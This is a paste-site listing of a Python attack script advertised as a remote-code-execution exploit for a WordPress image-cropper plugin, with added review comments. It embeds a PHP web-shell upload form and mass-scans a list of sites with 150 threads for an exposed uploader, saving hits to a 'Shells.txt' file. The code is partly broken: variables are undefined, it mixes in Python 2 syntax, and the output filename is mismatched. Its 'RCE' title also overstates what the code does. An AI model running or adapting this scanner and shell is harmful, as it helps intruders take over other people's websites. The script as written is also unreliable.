FlyFar

Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

Apr 22nd, 2024
  1. # Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
  2. # Date: 2024-04-16
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Contact: miladgrayhat@gmail.com
  5. # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
  6. # Vendor Homepage: https://wordpress.org
  7. # Software Link: https://wordpress.org/plugins/background-image-cropper/
  8. # Version: 1.2
  9. # Category : webapps
  10. # Tested on: windows 10 , firefox
  11.  
  12. import sys , requests, re
  13. from multiprocessing.dummy import Pool
  14. from colorama import Fore
  15. from colorama import init
  16. init(autoreset=True)
  # NOTE(review): `shell` holds a PHP upload form as a string. Nothing else in
  # the visible listing references it, so this script never sends it.
  17. shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
  18. "<form method='post' enctype='multipart/form-data'> <input type='file'
  19. name='zb'><input type='submit' name='upload' value='upload'></form>";
  20. if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
  21. $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
  22. Upload."; } } ?>"""
  # Silences urllib3 warnings; the HTTPS probe further down is made with
  # verify=False, which would otherwise emit one warning per request.
  23. requests.urllib3.disable_warnings()
  # Fixed request headers sent with every probe. The User-Agent carries the
  # misspellings "Mozlila", "Bulid" and "Moblie", and the referer is a bare
  # 'www.google.com' with no scheme; both are stable strings a defender can
  # match on in web-server or WAF logs.
  # NOTE(review): several string literals in this listing appear to have been
  # wrapped across gutter lines by the page rendering.
  24. headers = {'Connection': 'keep-alive',
  25.             'Cache-Control': 'max-age=0',
  26.             'Upgrade-Insecure-Requests': '1',
  27.             'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
  28. Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
  29. Chrome/60.0.3112.107 Moblie Safari/537.36',
  30.             'Accept':
  31. 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  32.             'Accept-Encoding': 'gzip, deflate',
  33.             'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
  34.             'referer': 'www.google.com'}
  # Reads the list named by argv[1], one stripped entry per line. Only a missing
  # argument (IndexError) is handled, by printing a usage line and exiting;
  # errors raised by open() itself are not caught here, and the file handle is
  # never closed explicitly.
  35. try:
  36.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  37. except IndexError:
  38.     path = str(sys.argv[0]).split('\\')
  39.     exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
  40.  
  def URLdomain(site):
      """Return the part of *site* that precedes its first path separator.

      A leading "http://" or "https://" is removed first (via str.replace, so
      every occurrence of that scheme string is dropped, not only the prefix).
      The remainder is then cut back repeatedly at its last "/" until no "/"
      is left.
      """
      for scheme in ("http://", "https://"):
          if site.startswith(scheme):
              site = site.replace(scheme, "")
              break
      up_to_last_slash = re.compile('(.*)/')
      found = up_to_last_slash.search(site)
      while found:
          # Keep only what the greedy group captured before the final slash.
          site = found.group(1)
          found = up_to_last_slash.search(site)
      return site
  53.  
  54.  
  # FourHundredThree(url): probe one site for an upload form at
  # /wp-content/plugins/background-image-cropper/ups.php.
  #
  # The host is reduced with URLdomain() and requested over plain HTTP first.
  # If the response body lacks the expected upload-form markup, the same path
  # is requested over HTTPS with certificate verification disabled
  # (verify=False). A match prints the URL and appends it to Shells.txt;
  # anything else, including any exception (bare `except`), is reported as
  # failed.
  #
  # NOTE(review): the visible code only issues GET requests and string-matches
  # the reply. It never uploads anything, so it finds hosts where such a form
  # is already reachable. Whether ups.php ships with the plugin or was placed
  # there by an earlier compromise is not shown on this page.
  # NOTE(review): `fg` and `fr` are not defined anywhere in the visible
  # listing, and the `print` statements are Python 2 syntax.
  # Defender view: requests for this exact path in access logs, and an ups.php
  # file in the plugin directory that is absent from a clean copy of the
  # plugin, are the artefacts to check for.
  55. def FourHundredThree(url):
  56.     try:
  57.         url = 'http://' + URLdomain(url)
  58.         check =
  59. requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
  60. allow_redirects=True,timeout=15)
  61.         if 'enctype="multipart/form-data" name="uploader"
  62. id="uploader"><input type="file" name="file" size="50"><input name="_upl"
  63. type="submit" id="_upl" value="Upload' in check.content:
  64.                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  65.                 open('Shells.txt', 'a').write(url +
  66. '/wp-content/plugins/background-image-cropper/ups.php\n')
  67.         else:
  68.             url = 'https://' + URLdomain(url)
  69.             check =
  70. requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
  71. allow_redirects=True,verify=False ,timeout=15)
  72.             if 'enctype="multipart/form-data" name="uploader"
  73. id="uploader"><input type="file" name="file" size="50"><input name="_upl"
  74. type="submit" id="_upl" value="Upload' in check.content:
  75.                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
  76.                     open('Shells.txt', 'a').write(url +
  77. '/wp-content/plugins/background-image-cropper/ups.php\n')
  78.             else:
  79.                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  80.     except :
  81.         print ' -| ' + url + ' --> {}[Failed]'.format(fr)
  82.  
  # Runs FourHundredThree over every entry in `target` using a pool of 150
  # workers (multiprocessing.dummy.Pool is thread-based), then waits for all of
  # them to finish. From the defender's side this shows up as a burst of
  # near-identical requests, each carrying the fixed headers defined above.
  83. mp = Pool(150)
  84. mp.map(FourHundredThree, target)
  85. mp.close()
  86. mp.join()
  87.  
  # NOTE(review): the closing message names LOL.txt, but the only file written
  # in the visible code is Shells.txt; `fc` is not defined in this listing.
  88. print '\n [!] {}Saved in LOL.txt'.format(fc)
  89.            